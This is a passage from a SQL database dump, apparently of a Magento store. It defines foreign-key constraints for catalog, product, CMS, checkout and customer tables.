  ADD CONSTRAINT `CAT_CTGR_PRD_CTGR_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`category_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_PRD_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_compare_item`
--
ALTER TABLE `catalog_compare_item`
  ADD CONSTRAINT `CATALOG_COMPARE_ITEM_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CATALOG_COMPARE_ITEM_PRODUCT_ID_CATALOG_PRODUCT_ENTITY_ENTITY_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CATALOG_COMPARE_ITEM_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL;

--
-- Constraints for table `catalog_eav_attribute`
--
ALTER TABLE `catalog_eav_attribute`
  ADD CONSTRAINT `CATALOG_EAV_ATTRIBUTE_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_bundle_option`
--
ALTER TABLE `catalog_product_bundle_option`
  ADD CONSTRAINT `CAT_PRD_BNDL_OPT_PARENT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`parent_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_bundle_option_value`
--
ALTER TABLE `catalog_product_bundle_option_value`
  ADD CONSTRAINT `CAT_PRD_BNDL_OPT_VAL_OPT_ID_CAT_PRD_BNDL_OPT_OPT_ID` FOREIGN KEY (`option_id`) REFERENCES `catalog_product_bundle_option` (`option_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_bundle_price_index`
--
ALTER TABLE `catalog_product_bundle_price_index`
  ADD CONSTRAINT `CAT_PRD_BNDL_PRICE_IDX_CSTR_GROUP_ID_CSTR_GROUP_CSTR_GROUP_ID` FOREIGN KEY (`customer_group_id`) REFERENCES `customer_group` (`customer_group_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_BNDL_PRICE_IDX_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_BNDL_PRICE_IDX_WS_ID_STORE_WS_WS_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_bundle_selection`
--
ALTER TABLE `catalog_product_bundle_selection`
  ADD CONSTRAINT `CAT_PRD_BNDL_SELECTION_OPT_ID_CAT_PRD_BNDL_OPT_OPT_ID` FOREIGN KEY (`option_id`) REFERENCES `catalog_product_bundle_option` (`option_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_BNDL_SELECTION_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_bundle_selection_price`
--
ALTER TABLE `catalog_product_bundle_selection_price`
  ADD CONSTRAINT `CAT_PRD_BNDL_SELECTION_PRICE_WS_ID_STORE_WS_WS_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_DCF37523AA05D770A70AA4ED7C2616E4` FOREIGN KEY (`selection_id`) REFERENCES `catalog_product_bundle_selection` (`selection_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_datetime`
--
ALTER TABLE `catalog_product_entity_datetime`
  ADD CONSTRAINT `CATALOG_PRODUCT_ENTITY_DATETIME_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_DTIME_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_DTIME_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_decimal`
--
ALTER TABLE `catalog_product_entity_decimal`
  ADD CONSTRAINT `CATALOG_PRODUCT_ENTITY_DECIMAL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_DEC_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_DEC_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_gallery`
--
ALTER TABLE `catalog_product_entity_gallery`
  ADD CONSTRAINT `CATALOG_PRODUCT_ENTITY_GALLERY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_GLR_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_GLR_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_int`
--
ALTER TABLE `catalog_product_entity_int`
  ADD CONSTRAINT `CATALOG_PRODUCT_ENTITY_INT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_INT_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_INT_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_media_gallery`
--
ALTER TABLE `catalog_product_entity_media_gallery`
  ADD CONSTRAINT `CAT_PRD_ENTT_MDA_GLR_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_media_gallery_value`
--
ALTER TABLE `catalog_product_entity_media_gallery_value`
  ADD CONSTRAINT `CAT_PRD_ENTT_MDA_GLR_VAL_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_MDA_GLR_VAL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_MDA_GLR_VAL_VAL_ID_CAT_PRD_ENTT_MDA_GLR_VAL_ID` FOREIGN KEY (`value_id`) REFERENCES `catalog_product_entity_media_gallery` (`value_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_media_gallery_value_to_entity`
--
ALTER TABLE `catalog_product_entity_media_gallery_value_to_entity`
  ADD CONSTRAINT `CAT_PRD_ENTT_MDA_GLR_VAL_TO_ENTT_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_A6C6C8FAA386736921D3A7C4B50B1185` FOREIGN KEY (`value_id`) REFERENCES `catalog_product_entity_media_gallery` (`value_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_media_gallery_value_video`
--
ALTER TABLE `catalog_product_entity_media_gallery_value_video`
  ADD CONSTRAINT `CAT_PRD_ENTT_MDA_GLR_VAL_VIDEO_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_6FDF205946906B0E653E60AA769899F8` FOREIGN KEY (`value_id`) REFERENCES `catalog_product_entity_media_gallery` (`value_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_text`
--
ALTER TABLE `catalog_product_entity_text`
  ADD CONSTRAINT `CATALOG_PRODUCT_ENTITY_TEXT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_TEXT_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_TEXT_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_tier_price`
--
ALTER TABLE `catalog_product_entity_tier_price`
  ADD CONSTRAINT `CAT_PRD_ENTT_TIER_PRICE_CSTR_GROUP_ID_CSTR_GROUP_CSTR_GROUP_ID` FOREIGN KEY (`customer_group_id`) REFERENCES `customer_group` (`customer_group_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_TIER_PRICE_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_TIER_PRICE_WS_ID_STORE_WS_WS_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_entity_varchar`
--
ALTER TABLE `catalog_product_entity_varchar`
  ADD CONSTRAINT `CATALOG_PRODUCT_ENTITY_VARCHAR_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_VCHR_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_ENTT_VCHR_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_frontend_action`
--
ALTER TABLE `catalog_product_frontend_action`
  ADD CONSTRAINT `CAT_PRD_FRONTEND_ACTION_CSTR_ID_CSTR_ENTT_ENTT_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_FRONTEND_ACTION_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_index_tier_price`
--
ALTER TABLE `catalog_product_index_tier_price`
  ADD CONSTRAINT `CAT_PRD_IDX_TIER_PRICE_CSTR_GROUP_ID_CSTR_GROUP_CSTR_GROUP_ID` FOREIGN KEY (`customer_group_id`) REFERENCES `customer_group` (`customer_group_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_IDX_TIER_PRICE_ENTT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_IDX_TIER_PRICE_WS_ID_STORE_WS_WS_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_index_website`
--
ALTER TABLE `catalog_product_index_website`
  ADD CONSTRAINT `CAT_PRD_IDX_WS_WS_ID_STORE_WS_WS_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_link`
--
ALTER TABLE `catalog_product_link`
  ADD CONSTRAINT `CATALOG_PRODUCT_LINK_PRODUCT_ID_CATALOG_PRODUCT_ENTITY_ENTITY_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_LNK_LNKED_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`linked_product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_LNK_LNK_TYPE_ID_CAT_PRD_LNK_TYPE_LNK_TYPE_ID` FOREIGN KEY (`link_type_id`) REFERENCES `catalog_product_link_type` (`link_type_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_link_attribute`
--
ALTER TABLE `catalog_product_link_attribute`
  ADD CONSTRAINT `CAT_PRD_LNK_ATTR_LNK_TYPE_ID_CAT_PRD_LNK_TYPE_LNK_TYPE_ID` FOREIGN KEY (`link_type_id`) REFERENCES `catalog_product_link_type` (`link_type_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_link_attribute_decimal`
--
ALTER TABLE `catalog_product_link_attribute_decimal`
  ADD CONSTRAINT `CAT_PRD_LNK_ATTR_DEC_LNK_ID_CAT_PRD_LNK_LNK_ID` FOREIGN KEY (`link_id`) REFERENCES `catalog_product_link` (`link_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_AB2EFA9A14F7BCF1D5400056203D14B6` FOREIGN KEY (`product_link_attribute_id`) REFERENCES `catalog_product_link_attribute` (`product_link_attribute_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_link_attribute_int`
--
ALTER TABLE `catalog_product_link_attribute_int`
  ADD CONSTRAINT `CAT_PRD_LNK_ATTR_INT_LNK_ID_CAT_PRD_LNK_LNK_ID` FOREIGN KEY (`link_id`) REFERENCES `catalog_product_link` (`link_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_D6D878F8BA2A4282F8DDED7E6E3DE35C` FOREIGN KEY (`product_link_attribute_id`) REFERENCES `catalog_product_link_attribute` (`product_link_attribute_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_link_attribute_varchar`
--
ALTER TABLE `catalog_product_link_attribute_varchar`
  ADD CONSTRAINT `CAT_PRD_LNK_ATTR_VCHR_LNK_ID_CAT_PRD_LNK_LNK_ID` FOREIGN KEY (`link_id`) REFERENCES `catalog_product_link` (`link_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_DEE9C4DA61CFCC01DFCF50F0D79CEA51` FOREIGN KEY (`product_link_attribute_id`) REFERENCES `catalog_product_link_attribute` (`product_link_attribute_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_option`
--
ALTER TABLE `catalog_product_option`
  ADD CONSTRAINT `CAT_PRD_OPT_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_option_price`
--
ALTER TABLE `catalog_product_option_price`
  ADD CONSTRAINT `CATALOG_PRODUCT_OPTION_PRICE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_OPT_PRICE_OPT_ID_CAT_PRD_OPT_OPT_ID` FOREIGN KEY (`option_id`) REFERENCES `catalog_product_option` (`option_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_option_title`
--
ALTER TABLE `catalog_product_option_title`
  ADD CONSTRAINT `CATALOG_PRODUCT_OPTION_TITLE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_OPT_TTL_OPT_ID_CAT_PRD_OPT_OPT_ID` FOREIGN KEY (`option_id`) REFERENCES `catalog_product_option` (`option_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_option_type_price`
--
ALTER TABLE `catalog_product_option_type_price`
  ADD CONSTRAINT `CATALOG_PRODUCT_OPTION_TYPE_PRICE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_B523E3378E8602F376CC415825576B7F` FOREIGN KEY (`option_type_id`) REFERENCES `catalog_product_option_type_value` (`option_type_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_option_type_title`
--
ALTER TABLE `catalog_product_option_type_title`
  ADD CONSTRAINT `CATALOG_PRODUCT_OPTION_TYPE_TITLE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_C085B9CF2C2A302E8043FDEA1937D6A2` FOREIGN KEY (`option_type_id`) REFERENCES `catalog_product_option_type_value` (`option_type_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_option_type_value`
--
ALTER TABLE `catalog_product_option_type_value`
  ADD CONSTRAINT `CAT_PRD_OPT_TYPE_VAL_OPT_ID_CAT_PRD_OPT_OPT_ID` FOREIGN KEY (`option_id`) REFERENCES `catalog_product_option` (`option_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_relation`
--
ALTER TABLE `catalog_product_relation`
  ADD CONSTRAINT `CAT_PRD_RELATION_CHILD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`child_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_RELATION_PARENT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`parent_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_super_attribute`
--
ALTER TABLE `catalog_product_super_attribute`
  ADD CONSTRAINT `CAT_PRD_SPR_ATTR_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_super_attribute_label`
--
ALTER TABLE `catalog_product_super_attribute_label`
  ADD CONSTRAINT `CATALOG_PRODUCT_SUPER_ATTRIBUTE_LABEL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_309442281DF7784210ED82B2CC51E5D5` FOREIGN KEY (`product_super_attribute_id`) REFERENCES `catalog_product_super_attribute` (`product_super_attribute_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_super_link`
--
ALTER TABLE `catalog_product_super_link`
  ADD CONSTRAINT `CAT_PRD_SPR_LNK_PARENT_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`parent_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_SPR_LNK_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_product_website`
--
ALTER TABLE `catalog_product_website`
  ADD CONSTRAINT `CATALOG_PRODUCT_WEBSITE_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_PRD_WS_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_url_rewrite_product_category`
--
ALTER TABLE `catalog_url_rewrite_product_category`
  ADD CONSTRAINT `CAT_URL_REWRITE_PRD_CTGR_CTGR_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`category_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_URL_REWRITE_PRD_CTGR_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `FK_BB79E64705D7F17FE181F23144528FC8` FOREIGN KEY (`url_rewrite_id`) REFERENCES `url_rewrite` (`url_rewrite_id`) ON DELETE CASCADE;

--
-- Constraints for table `checkout_agreement_store`
--
ALTER TABLE `checkout_agreement_store`
  ADD CONSTRAINT `CHECKOUT_AGREEMENT_STORE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CHKT_AGRT_STORE_AGRT_ID_CHKT_AGRT_AGRT_ID` FOREIGN KEY (`agreement_id`) REFERENCES `checkout_agreement` (`agreement_id`) ON DELETE CASCADE;

--
-- Constraints for table `cms_block_store`
--
ALTER TABLE `cms_block_store`
  ADD CONSTRAINT `CMS_BLOCK_STORE_BLOCK_ID_CMS_BLOCK_BLOCK_ID` FOREIGN KEY (`block_id`) REFERENCES `cms_block` (`block_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CMS_BLOCK_STORE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `cms_page_store`
--
ALTER TABLE `cms_page_store`
  ADD CONSTRAINT `CMS_PAGE_STORE_PAGE_ID_CMS_PAGE_PAGE_ID` FOREIGN KEY (`page_id`) REFERENCES `cms_page` (`page_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CMS_PAGE_STORE_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_address_entity`
--
ALTER TABLE `customer_address_entity`
  ADD CONSTRAINT `CUSTOMER_ADDRESS_ENTITY_PARENT_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_address_entity_datetime`
--
ALTER TABLE `customer_address_entity_datetime`
  ADD CONSTRAINT `CSTR_ADDR_ENTT_DTIME_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CSTR_ADDR_ENTT_DTIME_ENTT_ID_CSTR_ADDR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_address_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_address_entity_decimal`
--
ALTER TABLE `customer_address_entity_decimal`
  ADD CONSTRAINT `CSTR_ADDR_ENTT_DEC_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CSTR_ADDR_ENTT_DEC_ENTT_ID_CSTR_ADDR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_address_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_address_entity_int`
--
ALTER TABLE `customer_address_entity_int`
  ADD CONSTRAINT `CSTR_ADDR_ENTT_INT_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CSTR_ADDR_ENTT_INT_ENTT_ID_CSTR_ADDR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_address_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_address_entity_text`
--
ALTER TABLE `customer_address_entity_text`
  ADD CONSTRAINT `CSTR_ADDR_ENTT_TEXT_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CSTR_ADDR_ENTT_TEXT_ENTT_ID_CSTR_ADDR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_address_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_address_entity_varchar`
--
ALTER TABLE `customer_address_entity_varchar`
  ADD CONSTRAINT `CSTR_ADDR_ENTT_VCHR_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CSTR_ADDR_ENTT_VCHR_ENTT_ID_CSTR_ADDR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_address_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_eav_attribute`
--
ALTER TABLE `customer_eav_attribute`
  ADD CONSTRAINT `CUSTOMER_EAV_ATTRIBUTE_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_eav_attribute_website`
--
ALTER TABLE `customer_eav_attribute_website`
  ADD CONSTRAINT `CSTR_EAV_ATTR_WS_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CSTR_EAV_ATTR_WS_WS_ID_STORE_WS_WS_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_entity`
--
ALTER TABLE `customer_entity`
  ADD CONSTRAINT `CUSTOMER_ENTITY_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE SET NULL,
  ADD CONSTRAINT `CUSTOMER_ENTITY_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE SET NULL;

--
-- Constraints for table `customer_entity_datetime`
--
ALTER TABLE `customer_entity_datetime`
  ADD CONSTRAINT `CUSTOMER_ENTITY_DATETIME_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CUSTOMER_ENTITY_DATETIME_ENTITY_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_entity_decimal`
--
ALTER TABLE `customer_entity_decimal`
  ADD CONSTRAINT `CUSTOMER_ENTITY_DECIMAL_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CUSTOMER_ENTITY_DECIMAL_ENTITY_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_entity_int`
--
ALTER TABLE `customer_entity_int`
  ADD CONSTRAINT `CUSTOMER_ENTITY_INT_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CUSTOMER_ENTITY_INT_ENTITY_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_entity_text`
--
ALTER TABLE `customer_entity_text`
  ADD CONSTRAINT `CUSTOMER_ENTITY_TEXT_ATTRIBUTE_ID_EAV_ATTRIBUTE_ATTRIBUTE_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CUSTOMER_ENTITY_TEXT_ENTITY_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`entity_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `customer_entity_varchar`
--
ALTER TABLE `customer_entity_varchar`
